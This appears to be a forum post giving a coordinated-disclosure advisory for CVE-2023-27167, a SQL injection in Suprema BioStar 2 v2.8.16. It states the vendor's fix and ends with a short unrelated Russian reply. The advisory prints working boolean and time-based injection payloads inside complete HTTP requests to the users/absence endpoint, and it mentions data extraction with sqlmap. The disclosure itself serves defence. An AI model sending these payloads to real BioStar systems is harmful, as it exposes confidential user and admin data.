Article CVE-2023-27167 - Suprema BioStar 2 v2.8.16 - SQL Injection

[Vander]

​

I have discovered a vulnerability in Suprema's product - BioStar 2 v2.8.16. This vulnerability is classified as SQL Injection. At my request, MITRE assigned this vulnerability - CVE-2023-27167.

Below I provide detailed information about this vulnerability and a security advisory.

The developer of this product, Suprema, has confirmed the vulnerability, released an updated version, and gave permission for the publication of this information.

CVE-2023-27167 - Suprema BioStar 2 v2.8.16 - SQL Injection.​

Vendor of Product:

• Suprema

Vulnerability Type:

• SQL Injection

Affected Product Code Base:

• Suprema BioStar 2 - <= 2.8.16 Affected Versions

Affected Component:

• https://biostar2.server.net/api/users/absence?search_month=1

Attack Type:

• Remote

Attack Vectors:

• A potential attacker with remote web access to the Suprema BioStar 2 system with minimal privileges can craft a special web request, which in turn will lead to the injection of a SQL query into the database of this application. This will result in the disclosure of confidential information.

Description:

• The "values" JSON parameter appears to be vulnerable to SQL injection attacks. The payloads "and 3523=03523" and "and 3546=03546" were each submitted in the "values" JSON parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
• Additionally, the payload "(select*from(select(sleep(11)))a)" was submitted in the "values" JSON parameter. The application timed out when responding to the request, indicating that the injected SQL command caused a time delay. The database appears to be MySQL.

Evidence:

• Examples of vulnerable requests and parameters:
  • POST /api/users/absence?search_month=1 HTTP/1.1
  • Host: biostar2.server.net
    • Vulnerable parameter "values" (example):
      • {"Query":{"offset":0,"limit":51,"atLeastOneFilterExists":true,"conditions":[{"column":"user_group_id.id","operator":2,"values":["1 and 3523=03523",4840,20120]}],"orders":[],"total":false}}

Examples of vulnerable request:

#1

POST /api/users/absence?search_month=1 HTTP/1.1
Host: biostar2.server.net
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:107.0) Gecko/20100101 Firefox/107.0
Accept: application/json, text/plain, */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
content-type: application/json;charset=UTF-8
content-language: en
bs-session-id: 207c1c3c3b624fcc85b7f0814c4bf548
Content-Length: 204
Origin: https://biostar2.server.net
Connection: close
Referer: https://biostar2.server.net/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

{"Query":{"offset":0,"limit":51,"atLeastOneFilterExists":true,"conditions":[{"column":"user_group_id.id","operator":2,"values":["(select*from(select(sleep(7)))a)",4840,20120]}],"orders":[],"total":false}}

#2

POST /api/users/absence?search_month=1 HTTP/1.1
Host: biostar2.server.net
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:107.0) Gecko/20100101 Firefox/107.0
Accept: application/json, text/plain, */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
content-type: application/json;charset=UTF-8
content-language: en
bs-session-id: 207c1c3c3b624fcc85b7f0814c4bf548
Content-Length: 188
Origin: https://biostar2.server.net
Connection: close
Referer: https://biostar2.server.net/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

{"Query":{"offset":0,"limit":51,"atLeastOneFilterExists":true,"conditions":[{"column":"user_group_id.id","operator":2,"values":["1 and 3523=03523",4840,20120]}],"orders":[],"total":false}}

Screenshot that shows Time based SQL injection (set 4 – response delays for 8 seconds)

Screenshot that shows Time based SQL injection (set 13 – response delays for 26 seconds)

Screenshot that shows Boolean-based SQL injection (payload “1 and 9458=09458” means “1 and True”, so we can see information in response, regarding user with id 1, which is admin)

Screenshot that shows Boolean-based SQL injection (payload “1 and 9458=09453” means “1 and False”, so information, regarding user with id 1, which is admin, is absent in response)

Screenshot that shows example of exploitation (extracting data from DB) using sqlmap tool.

Screenshot that shows example of exploitation (extracting data from DB) using sqlmap tool.

Screenshot that shows example of exploitation (extracting data from DB) using sqlmap tool.​

Security Recommendations:

• Update software version to 2.9.1 with download link to suprema website - https://www.supremainc.com/en/support/biostar-2-package.asp.​

Thank you for your attention. The material was prepared specifically for protey.net​

 

[id2746]

Ура, наконец форум поднялся, это хорошие новости!